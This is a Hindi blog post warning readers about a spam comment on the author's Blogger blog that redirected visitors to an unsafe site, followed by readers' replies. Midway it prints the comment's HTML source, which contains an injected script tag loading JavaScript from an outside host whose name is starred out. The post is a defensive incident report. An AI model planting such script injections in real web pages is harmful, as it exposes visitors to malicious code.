पिछले दिनों इस चिट्ठे के एक पोस्ट में एक बेनामी टिप्पणी आई जो कुछ यूँ थी – asdlkhaaaaaaaa aaaaefaf"> " मुझे लगा कि ये मेरे कि...
पिछले दिनों इस चिट्ठे के एक पोस्ट में एक बेनामी टिप्पणी आई जो कुछ यूँ थी –
asdlkhaaaaaaaa
aaaaefaf"> "
मुझे लगा कि ये मेरे किसी ब्लॉग प्रशंसक (या धुर-आलोचक) की टिप्पणी है जो संभवतः हिन्दी में लिखना चाह रहा होगा और बेचारा कुछ समस्या के कारण लिख नहीं पा रहा होगा.
मेरे ईमेल में इसकी सूचना मिलते ही वस्तु-स्थिति जांचने अपने चिट्ठे पर जब उस टिप्पणी को देखने गया तो एक अजीब घटना हुई.
चिट्ठे पर टिप्पणी देखने की कड़ी को क्लिक करते ही वह ब्राउज़र को दूसरी साइट पर ले जाने लगा, और फ़ॉयरफ़ॉक्स के सुरक्षा तंत्र ने सचेत किया कि यह एक असुरक्षित साइट है.
एक सेकंड को तो कुछ समझ में नहीं आया कि ये क्या हो रहा है, परंतु फिर एकाएक बिजली कौंधी.
मुझे लगा कि हो न हो इस टिप्पणी में कुछ स्क्रिप्ट / कोड छुपा है – हालांकि ब्लॉगर किसी अवांछित कोड को टिप्पणी में डालने नहीं देता है, फिर भी होशियारी से कोई अवांछित कोड डालने में सफल हो ही चुका था.
उस टिप्पणी के एचटीएमएल स्रोत को देखने पर वह कुछ ऐसा दिखा –
<a href=3D"http://raviratlami.blogspo=
t.com/2007/07/u-s.html">=C2=BF=C7=9D=C9=B9=C7=9D=C9=A5 u=C7=9D=CA=87=CA=87=
=C4=B1=C9=B9=CA=8D s=C4=B1 =CA=87=C9=90=C9=A5=CA=8D</a>": <br><br> <B=
<SCRIPT SRC=3D"http://*****************/js/"/>asdlkhaaaaaaaa<BR/>aa=
aaefaf"> </B>" <br><br> <font color=3D"gray" size=3D"2"> <br>
जाहिर है, यह जो अपठनीय पाठ टिप्पणी के रूप में लिखा था, उसमें उस शैतानी साइट पर उपलब्ध शैतानी स्क्रिप्ट की कड़ी थी (जिसे मिटाकर ****** बना दिया गया है) जिसे लिंक किया गया था. ब्लॉगर टिप्पणी में आप किसी भी जाल पृष्ठ को लिंक कर सकते हैं – इसी सुविधा का लाभ यहाँ उठाया गया था. और मेरे चिट्ठे पर हमला किया था. आमतौर पर ऐसे चिट्ठे स्वचालित बॉट द्वारा किए जाते हैं जो एक साथ हजारों लाखों इंटरनेट पृष्ठों को अपना शिकार बनाने की कोशिश करते हैं – सुरक्षा की खामियाँ जहाँ दिखती हैं, वे उसी का इस्तेमाल करते हैं.
रहा सवाल जाल पृष्ठों पर हमलों का, तो कोई भी कभी भी सुरक्षित नहीं है – यह दुनिया रिलेटिव है. ये खबर देखें, जो ज्यादा पुरानी नहीं है – माइक्रोसॉफ़्ट की एक साइट को एक हैकर ने हैक कर उसमें सऊदी अरब का झंडा लहरा दिया था. हमला उसी तरह के डाटाबेस में हुआ था जिसमें हमारे आपके चिट्ठों के पाठ - चाहे वे ब्लॉगर के हों या वर्डप्रेस के - भंडारित रहते हैं.
ब्लॉग पोस्टें ऐसे स्पैम कमेंट से पहले भी समस्याग्रस्त रहती थीं और घोर समस्याग्रस्त रहती थीं. और इसी वजह से ज्ञानदत्त जैसे पाठकों को हो रही विशेष कठिनाइयों के बावजूद मेरे चिट्ठे की टिप्पणियों पर वर्ड-वेरिफ़िकेशन चलता रहा था. बीते कुछ दिनों से ऐसी समस्याओं में अच्छी खासी कमी आई थी – ब्लॉगर भी कुछ स्वचालित तंत्रों से स्पैम टिप्पणीकर्ताओं पर नजर रखता रहा था और मैंने वर्ड-वेरिफ़िकेशन को हटा दिया था.
मगर इस एक मात्र अपवाद स्वरूप प्राप्त प्रविष्टि ने मुझे फिर से चौंका दिया है. अगर ऐसे हमले जारी रहें तो फिर से वर्ड-वेरिफ़िकेशन प्रारंभ करना पड़ सकता है, और टिप्पणियों की कमी से भी जूझना पड़ सकता है – क्योंकि, जहाँ वर्ड वेरिफ़िकेशन के आड़े-टेढ़े अक्षर दिखने लगते हैं तो वहां से तो मैं भी कट लेता हूँ :)
सही समय मे हमें सचेत किया इसके लिये धंयवाद ।
जवाब देंहटाएंरवि जी, आपने चिट्ठाजगत को एक दम से सावधान करके हम सब के ऊपर बडा एहसान किया है.
जवाब देंहटाएंधन्यवाद रविजी, बहुत काम की बातें लाते हैं आप भी। और मुझ जैसे तकनीक-अपढ़ के लिए आप मां सरस्वती का वरदान हैं।
जवाब देंहटाएंयह गलत बात है की आपने शब्दो को सितारों मे बदल दिया, किसी को उस साइट पर जाना हो तो? स्पैम टिप्पणी की प्रतिक्षा करे? >:
जवाब देंहटाएं:)
मुझे हर दिन पाँच से दस स्पैम मिलती है, मगर मोडरेशन पर है इसलिए शांति है.
सचेतने के लिये साधुवाद. इस तरह के उपकार करते रहें तो हम सब बचे रहेंगे. :)
जवाब देंहटाएंबहुत-बहुत धन्यवाद रवि जी आपने बहुत ज्ञान की बात बताई है...
जवाब देंहटाएंसुनीता(शानू)
mere hindi blog ankurthoughts.blogspot.com par bhee aisa hua tha.
जवाब देंहटाएंmain to pareshaan ho gaya tha
धन्यवाद रवि जी, बडे ही काम की चीज बताई आपने..आगे से सचेत रहेगे ..ऐसी सम्स्याओ से जूझने के लिये.
जवाब देंहटाएंरविजी, बहुत बहुत धन्यवाद आपका । मेने भि अपने ब्लगमे वर्ड वेरिफ़िकेशन हटाया था । उसकेबाद कुछ अजिब किसिमके कमेन्ट्स आये आपका ब्लग पढ्नेके बाद इस प्रकारके लोगोंके बारेमा पता चला । धन्यवाद फिर एक बार देना चाहता हुँ आपको
जवाब देंहटाएंravi ji mera blog misfit/khazaanaa par verification maangaa jata hai kyon ...?
जवाब देंहटाएंkyaa kisee ne haik kiyaa hai kya yaa koi galatee hui hai setting me